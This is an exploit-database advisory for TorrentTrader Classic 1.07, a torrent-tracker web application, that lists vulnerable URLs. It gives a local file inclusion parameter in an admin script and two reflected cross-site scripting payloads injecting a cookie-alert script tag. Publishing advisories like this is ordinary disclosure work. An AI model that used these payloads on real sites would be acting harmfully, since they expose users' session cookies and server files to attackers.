id: 2204
date: 10/07/2007
title: TorrentTrader Classic 1.07 Multiple Remote Vulnerabilities
author: HACKERS PAL
cves: 

==========================================================
TorrentTrader Classic 1.07 Multiple Remote Vulnerabilities
==========================================================



TorrentTrader Classic Mutiple Remote vulnerabilities
Discovered By : HACKERS PAL

Tested on TorrentTrader Classic v1.07
local file inclusion
backend/admin-functions.php?ss_uri=dd
Xss
pjirc/css.php?color=<script>alert(document.cookie);</script>
browse.php?cat=<script>alert(document.cookie);</script>



#  0day.today [2023-03-22]  #